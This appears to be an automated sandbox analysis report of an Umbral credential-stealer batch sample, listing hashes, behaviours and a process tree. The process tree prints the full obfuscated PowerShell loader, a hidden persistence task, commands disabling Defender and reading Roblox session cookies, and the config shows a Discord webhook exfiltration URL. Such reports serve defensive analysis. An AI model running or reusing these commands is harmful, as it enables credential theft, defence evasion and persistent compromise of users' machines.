Analysis
-
max time kernel
96s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat
Resource
win10v2004-20240709-en
General
-
Target
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat
-
Size
232KB
-
MD5
7ebd033260b1e54dff5afd7c6534cf33
-
SHA1
cfb7040938237156fa3795755c77eecd7957bc39
-
SHA256
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
-
SHA512
18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f
-
SSDEEP
6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263026563675455508/40rqdx690bYgnTu5DlgourQDtU8ZayQ2_Y8DutOY8G3wIW-x3nALBQHeaH44QkXBTtII
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/4280-112-0x0000021930790000-0x00000219307D0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 21 4280 powershell.exe 24 4280 powershell.exe 31 4280 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4988 powershell.exe 1016 powershell.exe 5100 powershell.exe 1912 powershell.exe 1676 powershell.exe 3940 powershell.exe 1968 powershell.exe 752 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 31 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2836 wmic.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 4732 powershell.exe 4732 powershell.exe 1676 powershell.exe 1676 powershell.exe 4344 powershell.exe 4344 powershell.exe 1016 powershell.exe 1016 powershell.exe 4280 powershell.exe 4280 powershell.exe 5100 powershell.exe 5100 powershell.exe 5100 powershell.exe 4464 powershell.exe 4464 powershell.exe 4464 powershell.exe 1912 powershell.exe 1912 powershell.exe 1912 powershell.exe 4988 powershell.exe 4988 powershell.exe 4988 powershell.exe 752 powershell.exe 752 powershell.exe 3940 powershell.exe 3940 powershell.exe 3568 powershell.exe 3568 powershell.exe 1968 powershell.exe 1968 powershell.exe 1968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeIncreaseQuotaPrivilege 4344 powershell.exe Token: SeSecurityPrivilege 4344 powershell.exe Token: SeTakeOwnershipPrivilege 4344 powershell.exe Token: SeLoadDriverPrivilege 4344 powershell.exe Token: SeSystemProfilePrivilege 4344 powershell.exe Token: SeSystemtimePrivilege 4344 powershell.exe Token: SeProfSingleProcessPrivilege 4344 powershell.exe Token: SeIncBasePriorityPrivilege 4344 powershell.exe Token: SeCreatePagefilePrivilege 4344 powershell.exe Token: SeBackupPrivilege 4344 powershell.exe Token: SeRestorePrivilege 4344 powershell.exe Token: SeShutdownPrivilege 4344 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeSystemEnvironmentPrivilege 4344 powershell.exe Token: SeRemoteShutdownPrivilege 4344 powershell.exe Token: SeUndockPrivilege 4344 powershell.exe Token: SeManageVolumePrivilege 4344 powershell.exe Token: 33 4344 powershell.exe Token: 34 4344 powershell.exe Token: 35 4344 powershell.exe Token: 36 4344 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeIncreaseQuotaPrivilege 1016 powershell.exe Token: SeSecurityPrivilege 1016 powershell.exe Token: SeTakeOwnershipPrivilege 1016 powershell.exe Token: SeLoadDriverPrivilege 1016 powershell.exe Token: SeSystemProfilePrivilege 1016 powershell.exe Token: SeSystemtimePrivilege 1016 powershell.exe Token: SeProfSingleProcessPrivilege 1016 powershell.exe Token: SeIncBasePriorityPrivilege 1016 powershell.exe Token: SeCreatePagefilePrivilege 1016 powershell.exe Token: SeBackupPrivilege 1016 powershell.exe Token: SeRestorePrivilege 1016 powershell.exe Token: SeShutdownPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeSystemEnvironmentPrivilege 1016 powershell.exe Token: SeRemoteShutdownPrivilege 1016 powershell.exe Token: SeUndockPrivilege 1016 powershell.exe Token: SeManageVolumePrivilege 1016 powershell.exe Token: 33 1016 powershell.exe Token: 34 1016 powershell.exe Token: 35 1016 powershell.exe Token: 36 1016 powershell.exe Token: SeIncreaseQuotaPrivilege 1016 powershell.exe Token: SeSecurityPrivilege 1016 powershell.exe Token: SeTakeOwnershipPrivilege 1016 powershell.exe Token: SeLoadDriverPrivilege 1016 powershell.exe Token: SeSystemProfilePrivilege 1016 powershell.exe Token: SeSystemtimePrivilege 1016 powershell.exe Token: SeProfSingleProcessPrivilege 1016 powershell.exe Token: SeIncBasePriorityPrivilege 1016 powershell.exe Token: SeCreatePagefilePrivilege 1016 powershell.exe Token: SeBackupPrivilege 1016 powershell.exe Token: SeRestorePrivilege 1016 powershell.exe Token: SeShutdownPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeSystemEnvironmentPrivilege 1016 powershell.exe Token: SeRemoteShutdownPrivilege 1016 powershell.exe Token: SeUndockPrivilege 1016 powershell.exe Token: SeManageVolumePrivilege 1016 powershell.exe Token: 33 1016 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4952 wrote to memory of 2500 4952 cmd.exe 84 PID 4952 wrote to memory of 2500 4952 cmd.exe 84 PID 2500 wrote to memory of 5012 2500 cmd.exe 86 PID 2500 wrote to memory of 5012 2500 cmd.exe 86 PID 2500 wrote to memory of 4732 2500 cmd.exe 87 PID 2500 wrote to memory of 4732 2500 cmd.exe 87 PID 4732 wrote to memory of 1676 4732 powershell.exe 90 PID 4732 wrote to memory of 1676 4732 powershell.exe 90 PID 4732 wrote to memory of 4344 4732 powershell.exe 92 PID 4732 wrote to memory of 4344 4732 powershell.exe 92 PID 4732 wrote to memory of 1016 4732 powershell.exe 95 PID 4732 wrote to memory of 1016 4732 powershell.exe 95 PID 4732 wrote to memory of 2532 4732 powershell.exe 99 PID 4732 wrote to memory of 2532 4732 powershell.exe 99 PID 2532 wrote to memory of 3692 2532 cmd.exe 101 PID 2532 wrote to memory of 3692 2532 cmd.exe 101 PID 3692 wrote to memory of 2752 3692 cmd.exe 103 PID 3692 wrote to memory of 2752 3692 cmd.exe 103 PID 3692 wrote to memory of 4280 3692 cmd.exe 104 PID 3692 wrote to memory of 4280 3692 cmd.exe 104 PID 4280 wrote to memory of 5100 4280 powershell.exe 106 PID 4280 wrote to memory of 5100 4280 powershell.exe 106 PID 4280 wrote to memory of 4464 4280 powershell.exe 107 PID 4280 wrote to memory of 4464 4280 powershell.exe 107 PID 4280 wrote to memory of 1912 4280 powershell.exe 109 PID 4280 wrote to memory of 1912 4280 powershell.exe 109 PID 4280 wrote to memory of 4988 4280 powershell.exe 112 PID 4280 wrote to memory of 4988 4280 powershell.exe 112 PID 4280 wrote to memory of 752 4280 powershell.exe 114 PID 4280 wrote to memory of 752 4280 powershell.exe 114 PID 4280 wrote to memory of 3940 4280 powershell.exe 116 PID 4280 wrote to memory of 3940 4280 powershell.exe 116 PID 4280 wrote to memory of 3568 4280 powershell.exe 118 PID 4280 wrote to memory of 3568 4280 powershell.exe 118 PID 4280 wrote to memory of 3608 4280 powershell.exe 122 PID 4280 wrote to memory of 3608 4280 powershell.exe 122 PID 4280 wrote to memory of 4848 4280 powershell.exe 124 PID 4280 wrote to memory of 4848 4280 powershell.exe 124 PID 4280 wrote to memory of 4216 4280 powershell.exe 126 PID 4280 wrote to memory of 4216 4280 powershell.exe 126 PID 4280 wrote to memory of 1968 4280 powershell.exe 128 PID 4280 wrote to memory of 1968 4280 powershell.exe 128 PID 4280 wrote to memory of 2836 4280 powershell.exe 130 PID 4280 wrote to memory of 2836 4280 powershell.exe 130
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "3⤵PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"5⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "6⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe6⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3568
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption7⤵PID:3608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory7⤵PID:4848
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name7⤵
- Detects videocard installed
PID:2836
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
3KB
MD5ecb8def6ccd62ef59b8a1e0dd2fdcb8d
SHA1b8bd07efa21317b8ff161c15a59c36d8815b7c1b
SHA256f4567b1c79035678a453731445a74aec088e9c06dc68ddefcdce33f76746f659
SHA51252a5e0b696b5dc014b56a17c509a38b5f38cf30fe0979dd195f3f8b2a394b2897e4d488ff81a29e24c0ba06a74bd41ab70adfe8a1110a60b300acfc3d54cfaa9
-
Filesize
2KB
MD5e4de99c1795fd54aa87da05fa39c199c
SHA1dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA25623c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
-
Filesize
1KB
MD52114288fdfc8e55f47611663569c81ab
SHA1b90e27b1223903c32b629ba98f237ff177ccce85
SHA2565d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a
SHA512997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d
-
Filesize
1KB
MD57b417ed6e663604bd1eddfda9a3d4c63
SHA16094d58ea8026f589d58d80f222db8981a422f78
SHA256307c1ac075def49e873521c9389f652dd67a4d468bb24e022bbbdbb802e6441b
SHA5121ab48686acdd5e8bfa85ee984a83cea627f5527400b4872c28f00ffb16f58e46ff01431de0341e960d5ec8cfa4d96c738bb57cfd9eb4ba23e2773a47f4d385b6
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD57d938922c60b82c232e1dc1d2cb172d6
SHA18c5546fbca478815e77f5dff30fe00e5e5fd6a9a
SHA256463e9ebf5171ef9ead61019e5fa863ecd958d4390e88079394a98c050ad32a1f
SHA512479ac4d43bcaea8059ff4ae9023e35f81e2d04eba16b3bec76c1b198891b2b8ea27a03e3862ca73dbe2e98dae5538b007df8418f10c2e3f52c93bcbbae10f105
-
Filesize
1KB
MD5d3235ed022a42ec4338123ab87144afa
SHA15058608bc0deb720a585a2304a8f7cf63a50a315
SHA25610663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf
-
Filesize
1KB
MD5a741693e3bedb37a2fd9108dda307de0
SHA18e91bc3dc6205b7ea5fb0772f75c727712498bee
SHA2568b76b4abf8b6c8cc9ad4024b6c75c930b3ef82d8e2b41522925cd274f029dc3c
SHA5120f59e51db6d3677d07b902c68e79ee486b1064ff7526c4b18dde82fae87202204ebff4171e85cd88fe4588f1922a9d1be99d678db0f76e61e26578e30d79854f
-
Filesize
1KB
MD597748f71ed95026706014e8524266292
SHA1f60663ea2e2a778c57d07d9678fe04c79c3ff942
SHA256f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
SHA512b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9
-
Filesize
1KB
MD566efc53ff91b80197e410958e85e5acb
SHA1e83b8d736f4e00a43fb552234a2b9d5a038a453d
SHA256843bc715821806bca9378c87f0dffd72da15cdaff35fcd6da5b65f8c69fe15ab
SHA51286c4e1af41a0d848e4c0da33334b0289930b8e25d863c3654dc622298e8fc5359c714818c8d960ef9a7c3e1e59fb638c823a8880e86b7f5a879bff372ac0f518
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
232KB
MD57ebd033260b1e54dff5afd7c6534cf33
SHA1cfb7040938237156fa3795755c77eecd7957bc39
SHA256e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
SHA51218175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f